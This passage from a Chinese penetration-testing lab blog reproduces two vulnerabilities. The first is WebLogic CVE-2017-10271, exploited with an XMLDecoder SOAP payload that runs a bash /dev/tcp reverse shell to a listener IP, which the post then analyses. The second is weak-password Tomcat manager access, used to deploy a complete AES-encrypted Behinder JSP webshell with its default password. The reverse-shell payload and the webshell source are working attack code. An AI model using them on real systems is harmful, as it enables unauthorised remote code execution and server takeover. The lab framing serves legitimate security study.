</span></span><span class="line"><span class="cl"><span class="nt">&lt;array</span> <span class="na">class=</span><span class="s">&#34;java.lang.String&#34;</span> <span class="na">length=</span><span class="s">&#34;3&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">&#34;0&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;string&gt;</span>/bin/bash<span class="nt">&lt;/string&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/void&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">&#34;1&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;string&gt;</span>-c<span class="nt">&lt;/string&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/void&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;void</span> <span class="na">index=</span><span class="s">&#34;2&#34;</span><span class="nt">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;string&gt;</span>bash -i &gt;<span class="err">&amp;</span> /dev/tcp/172.22.0.1/21 0&gt;<span class="err">&amp;</span>1<span class="nt">&lt;/string&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/void&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/array&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;void</span> <span class="na">method=</span><span class="s">&#34;start&#34;</span><span class="nt">/&gt;&lt;/void&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/java&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/work:WorkContext&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/soapenv:Header&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;soapenv:Body/&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nt">&lt;/soapenv:Envelope&gt;</span>
</span></span></code></pre></div><h5 id="分析xml">分析xml
</h5><ol>
<li>
<p><strong>攻击目标</strong>：</p>
<ul>
<li>
<p>目标地址：<code>192.168.200.134:7001</code>，指向内网的WebLogic服务（默认端口7001）。</p>
</li>
<li>
<p>请求路径：<code>/wls-wsat/CoordinatorPortType</code>，该接口用于WebLogic的WS-AtomicTransaction服务。</p>
</li>
</ul>
</li>
<li>
<p><strong>漏洞利用特征</strong>：</p>
<ul>
<li>
<p><strong>Content-Type: text/xml</strong>：发送XML格式数据，利用SOAP协议处理机制。</p>
</li>
<li>
<p><strong>恶意SOAP Payload</strong>：</p>
<ul>
<li>
<p>使用<code>java.beans.XMLDecoder</code>反序列化XML数据，构造<code>ProcessBuilder</code>对象。</p>
</li>
<li>
<p>执行命令：<code>/bin/bash -c &quot;bash -i &gt;&amp; /dev/tcp/172.22.0.1/21 0&gt;&amp;1&quot;</code>，尝试建立到攻击者IP（172.22.0.1）的21端口的反向Shell连接。</p>
</li>
</ul>
</li>
</ul>
</li>
<li>
<p><strong>关联漏洞</strong>：</p>
<ul>
<li>利用<strong>CVE-2017-10271</strong>（CVSS 7.5），WebLogic WLS Security组件反序列化漏洞，允许未经身份验证的远程代码执行。</li>
</ul>
</li>
<li>
<p><strong>攻击意图</strong>：</p>
<ul>
<li>
<p><strong>远程控制</strong>：通过反向Shell获取服务器命令行权限，进一步植入恶意软件或窃取数据。</p>
</li>
<li>
<p><strong>内网渗透</strong>：攻击者可能尝试从内部网络横向移动。</p>
</li>
</ul>
</li>
<li>
<p><strong>技术细节</strong>：</p>
<ul>
<li>
<p><strong>XMLDecoder反序列化</strong>：WebLogic未对传入的XML数据做安全校验，导致恶意Java代码被执行。</p>
</li>
<li>
<p><strong>ProcessBuilder命令注入</strong>：通过启动新进程执行系统命令，绕过安全限制。</p>
</li>
</ul>
</li>
</ol>
<h5 id="监听端口并重新发送数据包">监听端口并重新发送数据包
</h5><p>    由于没有公网ip，这里只能提前进入容器内查看ip地址，以将shell连接发送到可到达的ip地址。可以通过<code>sudo docker exec -it &lt;容器id&gt; /bin/bash</code>命令查看容器ip。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-18-05-image.png"
	width="595"
	height="334"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-18-05-image_hu_5ea3a85627597c57.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-20-18-05-image_hu_1647daec3259bf84.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="178"
		data-flex-basis="427px"
	
></p>
<p>    在上面构造的数据包中，反向shell连接被建立到<code>172.22.0.1</code>(kali与该容器共存的网段)的21端口，因此在kali中使用命令<code>nc -lvp 21</code>监听21端口后发送构造后的数据包。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-39-48-image.png"
	width="2578"
	height="1106"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-39-48-image_hu_61cd402c82eace7.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-19-39-48-image_hu_a750e20696fc9df7.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="233"
		data-flex-basis="559px"
	
>    然后重新发送该数据包后，可见响应数据明显不同，成功进入Shell。尝试执行<code>whoami</code>与<code>ifconfig</code>：</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-38-38-image.png"
	width="653"
	height="459"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-19-38-38-image_hu_119a339439f777ed.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-19-38-38-image_hu_483b03c055d86be2.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="142"
		data-flex-basis="341px"
	
></p>
<p>    漏洞复现结束。</p>
<h3 id="tomcattomcat8弱口令后台上传">tomcat/tomcat8弱口令后台上传
</h3><h4 id="tomcattomcat8漏洞原理">tomcat/tomcat8漏洞原理
</h4><p>    Tomcat支持在后台部署war文件，可以直接将webshell部署到web目录下。其中，欲访问后台，需要对应用户有相应权限。</p>
<p>    使用爆破工具登入tomcat后台，这里直接使用弱密码登入。</p>
<h4 id="上传一句话木马">上传一句话木马
</h4><p>    新建shell.jsp文件，输入一句话木马，这里的密码是rebeyond。压缩为zip文件后将zip后缀修改为war。</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-java" data-lang="java"><span class="line"><span class="cl"><span class="o">&lt;%</span><span class="nd">@page</span><span class="w"> </span><span class="n">import</span><span class="o">=</span><span class="s">&#34;java.util.*,javax.crypto.*,javax.crypto.spec.*&#34;</span><span class="o">%&gt;</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="o">&lt;%!</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="kd">class</span> <span class="nc">U</span><span class="w"> </span><span class="kd">extends</span><span class="w"> </span><span class="n">ClassLoader</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="n">U</span><span class="p">(</span><span class="n">ClassLoader</span><span class="w"> </span><span class="n">c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="kd">super</span><span class="p">(</span><span class="n">c</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="kd">public</span><span class="w"> </span><span class="n">Class</span><span class="w"> </span><span class="nf">g</span><span class="p">(</span><span class="kt">byte</span><span class="w"> </span><span class="o">[]</span><span class="n">b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="k">return</span><span class="w"> </span><span class="kd">super</span><span class="p">.</span><span class="na">defineClass</span><span class="p">(</span><span class="n">b</span><span class="p">,</span><span class="w"> </span><span class="n">0</span><span class="p">,</span><span class="w"> </span><span class="n">b</span><span class="p">.</span><span class="na">length</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="o">%&gt;</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="o">&lt;%</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="na">getMethod</span><span class="p">().</span><span class="na">equals</span><span class="p">(</span><span class="s">&#34;POST&#34;</span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="n">String</span><span class="w"> </span><span class="n">k</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">&#34;e45e329feb5d925b&#34;</span><span class="p">;</span><span class="w"> </span><span class="c1">// 该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="n">session</span><span class="p">.</span><span class="na">putValue</span><span class="p">(</span><span class="s">&#34;u&#34;</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="n">Cipher</span><span class="w"> </span><span class="n">c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Cipher</span><span class="p">.</span><span class="na">getInstance</span><span class="p">(</span><span class="s">&#34;AES&#34;</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="n">c</span><span class="p">.</span><span class="na">init</span><span class="p">(</span><span class="n">2</span><span class="p">,</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">SecretKeySpec</span><span class="p">(</span><span class="n">k</span><span class="p">.</span><span class="na">getBytes</span><span class="p">(),</span><span class="w"> </span><span class="s">&#34;AES&#34;</span><span class="p">));</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="k">new</span><span class="w"> </span><span class="n">U</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="na">getClass</span><span class="p">().</span><span class="na">getClassLoader</span><span class="p">()).</span><span class="na">g</span><span class="p">(</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="n">c</span><span class="p">.</span><span class="na">doFinal</span><span class="p">(</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">                </span><span class="k">new</span><span class="w"> </span><span class="n">sun</span><span class="p">.</span><span class="na">misc</span><span class="p">.</span><span class="na">BASE64Decoder</span><span class="p">().</span><span class="na">decodeBuffer</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="na">getReader</span><span class="p">().</span><span class="na">readLine</span><span class="p">())</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">            </span><span class="p">)</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">        </span><span class="p">).</span><span class="na">newInstance</span><span class="p">().</span><span class="na">equals</span><span class="p">(</span><span class="n">pageContext</span><span class="p">);</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="w">    </span><span class="p">}</span><span class="w">
</span></span></span><span class="line"><span class="cl"><span class="o">%&gt;</span><span class="w">
</span></span></span></code></pre></div><p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-22-50-image.png"
	width="1206"
	height="126"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-22-50-image_hu_4979fe8afc53e259.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-20-22-50-image_hu_133094c3f7db93e2.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="957"
		data-flex-basis="2297px"
	
></p>
<p>    通过tomcat后台将shell.war上传到服务器，然后部署。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-04-image.png"
	width="628"
	height="123"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-04-image_hu_b9bcc07e74d2c4ee.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-04-image_hu_18b1825bf5bef857.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="510"
		data-flex-basis="1225px"
	
></p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-45-image.png"
	width="2492"
	height="174"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-45-image_hu_f2371c2ae6851a53.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-20-28-45-image_hu_4f645e32f2334e88.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="1432"
		data-flex-basis="3437px"
	
></p>
<h4 id="使用webshell连接工具连接">使用webshell连接工具连接
</h4><p>    可见上传成功，使用冰蝎连接到webshell，连接成功。</p>
<p><img src="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-44-17-image.png"
	width="869"
	height="361"
	srcset="/blog-by-hugo/post/wldk-week2/img/2025-03-04-20-44-17-image_hu_968fb186aba97340.png 480w, /blog-by-hugo/post/wldk-week2/img/2025-03-04-20-44-17-image_hu_7113d336a7e8fd04.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="240"
		data-flex-basis="577px"
	
></p>

</section>


    <footer class="article-footer">
    
    <section class="article-tags">
        
            <a href="/blog-by-hugo/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
        
    </section>


    <section class="article-lastmod">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <span>
            Last updated on Apr 26, 2026 14:52 &#43;0800
        </span>
    </section></footer>


    
</article>

    

    


    
        
    

    <footer class="site-footer">
    <section class="copyright">
        &copy;
        
            2025 -
        
        2026 远楒
    </section>

    <section class="powerby">
        
            星藏点雪，月隐晦明 <br/>
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.29.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link
                rel="stylesheet"
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link
                rel="stylesheet"
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/blog-by-hugo/ts/main.1b68ca70253b523eabb06a943631ea672d424976a40c495cc6a889635f51d0f9.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>
<style>
    #TableOfContents > ul, ol {
        ul, ol {
            display: none;
        }

        .open {
            display: block;
        }
    }

    .article-content .mermaid-block {
        overflow-x: auto;
        margin: 1.5rem 0;
        padding: 1rem;
        border-radius: var(--card-border-radius);
        background: rgba(127, 127, 127, 0.08);
    }

    .article-content .mermaid {
        min-width: max-content;
        text-align: center;
    }

    .article-content .mermaid svg {
        display: block;
        height: auto;
    }

    [data-scheme="dark"] .article-content .mermaid-block {
        border: 1px solid var(--card-separator-color);
        background: rgba(255, 255, 255, 0.04);
    }
</style>

<script
                src="https://cdn.jsdelivr.net/npm/mermaid@11.14.0/dist/mermaid.min.js"crossorigin="anonymous"
                
                >
            </script>

<script>
    const mermaidSelector = ".article-content .mermaid";
    let mermaidRenderQueue = Promise.resolve();

    if (window.mermaid) {
        window.mermaid.initialize({
            startOnLoad: false,
            securityLevel: "loose"
        });
    }

    function initTocHide() {
        let toc = document.querySelector(".widget--toc");
        if (!toc) {
            return;
        }

        window.addEventListener("scroll", function() {
            let currentLi = document.querySelector(".active-class");
            if (!currentLi) {
                return;
            }

            let elementsByClassName = document.querySelectorAll(".open");
            if (elementsByClassName.length > 0) {
                elementsByClassName.forEach((ul) => {
                    ul.classList.remove("open");
                });
            }

            if (currentLi.children.length > 1) {
                currentLi.children[1].classList.add("open");
            }

            let ul = currentLi.parentElement;
            do {
                ul.classList.add("open");
                ul = ul.parentElement.parentElement;
            } while (ul !== undefined && (ul.localName === "ul" || ul.localName === "ol"));
        });
    }

    function isDarkMode() {
        return document.documentElement.dataset.scheme === "dark";
    }

    function getMermaidThemeConfig() {
        if (isDarkMode()) {
            return {
                scheme: "dark",
                theme: "base",
                themeVariables: {
                    darkMode: true,
                    background: "#424242",
                    primaryColor: "#4b5563",
                    primaryTextColor: "#f5f5f5",
                    primaryBorderColor: "#d1d5db",
                    secondaryColor: "#5b5b5b",
                    secondaryTextColor: "#f5f5f5",
                    secondaryBorderColor: "#d1d5db",
                    tertiaryColor: "#3f3f46",
                    tertiaryTextColor: "#f5f5f5",
                    tertiaryBorderColor: "#d1d5db",
                    lineColor: "#d1d5db",
                    textColor: "#f5f5f5",
                    mainBkg: "#4b5563",
                    noteBkgColor: "#57534e",
                    noteTextColor: "#f5f5f5",
                    noteBorderColor: "#d6d3d1",
                    actorBkg: "#4b5563",
                    actorBorder: "#d1d5db",
                    actorLineColor: "#d1d5db",
                    actorTextColor: "#f5f5f5",
                    signalColor: "#e5e7eb",
                    signalTextColor: "#f5f5f5",
                    labelBoxBkgColor: "#4b5563",
                    labelBoxBorderColor: "#d1d5db",
                    labelTextColor: "#f5f5f5",
                    loopTextColor: "#f5f5f5",
                    activationBkgColor: "#5b5b5b",
                    activationBorderColor: "#d1d5db",
                    sequenceNumberColor: "#111827"
                }
            };
        }

        return {
            scheme: "light",
            theme: "base",
            themeVariables: {
                darkMode: false,
                background: "#ffffff",
                primaryColor: "#eef2ff",
                primaryTextColor: "#1f2937",
                primaryBorderColor: "#6366f1",
                secondaryColor: "#f3f4f6",
                secondaryTextColor: "#1f2937",
                secondaryBorderColor: "#9ca3af",
                tertiaryColor: "#f8fafc",
                tertiaryTextColor: "#1f2937",
                tertiaryBorderColor: "#cbd5e1",
                lineColor: "#4b5563",
                textColor: "#1f2937",
                mainBkg: "#eef2ff",
                noteBkgColor: "#fef3c7",
                noteTextColor: "#1f2937",
                noteBorderColor: "#d97706",
                actorBkg: "#eef2ff",
                actorBorder: "#6366f1",
                actorLineColor: "#6366f1",
                actorTextColor: "#111827",
                signalColor: "#374151",
                signalTextColor: "#1f2937",
                labelBoxBkgColor: "#eef2ff",
                labelBoxBorderColor: "#6366f1",
                labelTextColor: "#111827",
                loopTextColor: "#111827",
                activationBkgColor: "#f3f4f6",
                activationBorderColor: "#9ca3af",
                sequenceNumberColor: "#ffffff"
            }
        };
    }

    function getMermaidNodes() {
        return Array.from(document.querySelectorAll(mermaidSelector));
    }

    function getMermaidSource(node) {
        const sourceTemplate = node.parentElement?.querySelector(".mermaid-source");

        if (sourceTemplate instanceof HTMLTemplateElement) {
            return sourceTemplate.innerHTML.trim();
        }

        return node.innerHTML.trim();
    }

    function prepareMermaidNodes(scheme) {
        const nodes = getMermaidNodes();

        nodes.forEach((node) => {
            if (!node.dataset.mermaidSource) {
                node.dataset.mermaidSource = getMermaidSource(node);
            }

            if (node.dataset.mermaidRenderedScheme !== scheme) {
                node.removeAttribute("data-processed");
                node.innerHTML = node.dataset.mermaidSource;
            }
        });

        return nodes;
    }

    function getMermaidStyleOverrides(svgId) {
        if (!isDarkMode()) {
            return "";
        }

        const selector = "#" + svgId;

        return `
${selector} {
    background: transparent !important;
}

${selector} .actor,
${selector} .labelBox {
    fill: #4b5563 !important;
    stroke: #d1d5db !important;
}

${selector} .actor-line,
${selector} .innerArc,
${selector} .messageLine0,
${selector} .messageLine1,
${selector} .loopLine {
    stroke: #d1d5db !important;
}

${selector} [id$="-arrowhead"] path,
${selector} [id$="-crosshead"] path,
${selector} .marker,
${selector} .marker.cross {
    fill: #d1d5db !important;
    stroke: #d1d5db !important;
}

${selector} .actor-box,
${selector} .messageText,
${selector} .messageText tspan,
${selector} .labelText,
${selector} .labelText tspan,
${selector} .loopText,
${selector} .loopText tspan,
${selector} .noteText,
${selector} .noteText tspan,
${selector} text.actor > tspan {
    fill: #f5f5f5 !important;
    stroke: none !important;
}

${selector} .note {
    fill: #57534e !important;
    stroke: #d6d3d1 !important;
}

${selector} .activation0,
${selector} .activation1,
${selector} .activation2 {
    fill: #5b5b5b !important;
    stroke: #d1d5db !important;
}

${selector} [id$="-sequencenumber"] {
    fill: #d1d5db !important;
}

${selector} .sequenceNumber {
    fill: #111827 !important;
}
`;
    }

    function applyMermaidThemeStyles() {
        document.querySelectorAll(`${mermaidSelector} svg[id]`).forEach((svg) => {
            let styleEl = svg.querySelector("style[data-stack-mermaid-theme]");

            if (!styleEl) {
                styleEl = document.createElementNS("http://www.w3.org/2000/svg", "style");
                styleEl.setAttribute("data-stack-mermaid-theme", "true");
                svg.appendChild(styleEl);
            }

            styleEl.textContent = getMermaidStyleOverrides(svg.id);
        });
    }

    async function renderMermaidDiagrams() {
        if (!window.mermaid) {
            return;
        }

        const { scheme, theme, themeVariables } = getMermaidThemeConfig();
        const nodes = getMermaidNodes();

        if (!nodes.length) {
            return;
        }

        const needsRender = nodes.some((node) => {
            return node.dataset.mermaidRenderedScheme !== scheme || node.getAttribute("data-processed") !== "true";
        });

        if (!needsRender) {
            return;
        }

        prepareMermaidNodes(scheme);

        window.mermaid.initialize({
            startOnLoad: false,
            theme,
            themeVariables,
            securityLevel: "loose"
        });

        await window.mermaid.run({
            querySelector: mermaidSelector
        });

        getMermaidNodes().forEach((node) => {
            node.dataset.mermaidRenderedScheme = scheme;
        });

        applyMermaidThemeStyles();
    }

    function queueMermaidRender() {
        mermaidRenderQueue = mermaidRenderQueue
            .catch(() => undefined)
            .then(() => renderMermaidDiagrams())
            .catch((error) => {
                console.error("Failed to render Mermaid diagrams:", error);
            });

        return mermaidRenderQueue;
    }

    initTocHide();

    window.addEventListener("load", function() {
        queueMermaidRender();
    });

    window.addEventListener("onColorSchemeChange", function() {
        applyMermaidThemeStyles();
        queueMermaidRender();
    });
</script>

    </body>
</html>
